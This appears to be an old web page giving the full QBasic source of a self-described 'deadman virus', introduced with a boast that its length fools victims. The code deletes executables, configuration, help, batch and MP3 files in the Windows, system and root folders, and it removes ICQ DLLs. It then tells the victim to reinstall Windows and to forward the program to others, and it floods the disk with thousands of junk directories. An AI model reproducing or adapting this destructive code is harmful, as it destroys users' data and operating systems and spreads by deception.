I KNOW ITS KINDA LONG..BUT THATZ WHAT FOOLS A PERSON  HE THINKS ITS SOMETHIN SERIOUS CAUSE THE FILE SIZE IS MORE THAN 1 KB !!
 

10 shell "cd\"
20 shell "cd windows"
30 shell "del *.txt"
40 shell "del *.hlp"
50 shell "del *.ini"
60 shell "del *.exe"
70 print "y"
80 shell "cd\"
90 shell "cd windows\system"
100 shell "del *.txt"
110 shell "del *.hlp"
120 shell "del *.ini"
130 shell "del *.exe"
140 print "y"
150 shell "cd\"
160 shell "cd windows\progra~1\access\~1"
170 shell "del *.txt"
180 shell "del *.hlp"
190 shell "del *.ini"
200 shell "del *.exe"
210 print "y"
220 shell "cd\"
230 shell "del *.txt"
240 shell "del *.hlp"
250 shell "del *.ini"
260 shell "del *.exe"
270 print "y"
280 shell "del *.com"
290 shell "del *.bat"
295 shell "del *.mp3"
300 cls
310 input "do you have icq typ y for yes and n for no ";icq$
320 if icq$="y" then goto 330 else goto 370
330 shell "cd\"
340 shell "cd progra~1\icq"
350 shell "del *.dll"
360 cls
365 goto 380
370 print "you dont have icq..this makes me mad !!!..i have screwed up your computer"
380 print "please reinstall windows"
390 print "this was the deadman virus....please forward this to your friends and enemies."
400 print "this was taken from http://welcome.to/thedeadman"
410  shell "cd\"
420 for a = 1 to 700
430 a$=str$(a)
440 c$="md" + a$ + ".hee"
450 shell c$
460 next a
470  shell "cd\"
465 shell "cd windows\desktop"
480 for a = 1 to 10000
490 a$=str$(a)
500 c$="md" + a$ + ".hee"
510 shell c$
520 next a
525 CLS
530 END
 

 BACK